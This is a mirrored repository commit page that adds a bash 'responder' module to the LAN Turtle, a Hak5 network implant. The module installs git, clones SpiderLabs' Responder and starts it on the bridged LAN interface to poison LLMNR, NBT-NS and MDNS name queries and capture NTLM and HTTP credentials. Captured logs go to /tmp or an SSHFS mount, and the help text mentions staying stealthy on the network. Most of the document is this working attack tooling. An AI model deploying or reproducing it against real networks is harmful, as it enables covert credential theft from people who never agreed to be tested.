hak5
/
lanturtle-modules
mirror of https://github.com/hak5/lanturtle-modules.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

New module responder 

Responder is an LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. The program itself can be viewed here: https://github.com/SpiderLabs/Responder

I have created a module that can use this program and save the logs to sshfs or tmp.
pull/8/head
IMcPwn 2015-09-19 10:09:34 -04:00
parent fb0d939a24
commit d294178b9c
1 changed files with 114 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

114
modules/responder Normal file
View File

@ -0,0 +1,114 @@
#!/bin/bash /usr/lib/turtle/turtle_module
VERSION="1.0"
DESCRIPTION="Responder - LLMNR, NBT-NS and MDNS poisoner"
CONF=/tmp/responder.form
AUTHOR=IMcPwn
: ${DIALOG_OK=0}
: ${DIALOG_CANCEL=1}
: ${DIALOG_HELP=2}
: ${DIALOG_EXTRA=3}
: ${DIALOG_ESC=255}
function start {
if [ ! -s /usr/bin/git ]; then
opkg update && opkg install git
fi
if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; then
rm -r /etc/turtle/Responder
git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
fi
if [ -s /etc/config/responder ];
then
responder_log=$(uci get responder.log)
case $responder_log in
sshfs)
if pgrep sshfs > /dev/null; then
echo "SSHFS Running"
if [[ ! -L /etc/turtle/Responder/logs || ! -L /sshfs/Responder/logs ]]; then
rm -r /etc/turtle/Responder/logs
mkdir -p /sshfs/Responder/logs
ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
echo responder started and logs are being saved to /sshfs
fi
else
echo "SSHFS not running"
fi
;;
tmp)
if [[ ! -L /etc/turtle/Responder/logs || ! -L /tmp/Responder/logs ]]; then
rm -r /etc/turtle/Responder/logs
mkdir -p /tmp/Responder/logs
ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
echo responder started and logs are being saved to /tmp
fi
;;
esac
else
echo "Responder not configured."
fi
}
function stop {
kill $(ps | grep -w [/]etc/turtle/Responder/Responder.py | awk {'print $1'})
}
function status {
if ps | grep -w -q [/]etc/turtle/Responder/Responder.py; then echo "1"; else echo "0"; fi
}
function configure {
if [ -s /etc/config/responder ]
then
responder_log=$(uci get responder.log)
else
touch /etc/config/responder
fi
dialog --ok-label "Submit" \
--help-button \
--title "Responder Configuration" \
--radiolist "\n\
Responder is an LLMNR, NBT-NS and MDNS poisoner.\n\nNOTICE: The first time you run this module it may take a long time to load. Please let it finish.\n\nThe log files can be saved to SSHFS or /tmp.\n" 16 60 3\
1 "Save log to SSHFS if available." off\
2 "Save log to /tmp/" off\
2>$CONF
return=$?
case $return in
$DIALOG_OK)
LOG=$(cat $CONF)
case $LOG in
1)
uci set responder.log="sshfs"
uci commit responder
;;
2)
uci set responder.log="tmp"
uci commit responder
;;
esac
;;
$DIALOG_CANCEL)
rm $CONF
clear
exit;;
$DIALOG_HELP)
dialog --title "Help" \
--msgbox "\
Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\
By default, the tool will only answer to File Server Service request, which is for SMB.\n\n\
The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\
For more information, see: https://github.com/SpiderLabs/Responder\n\
" 20 60
configure
;;
$DIALOG_ESC)
clear;;
esac
}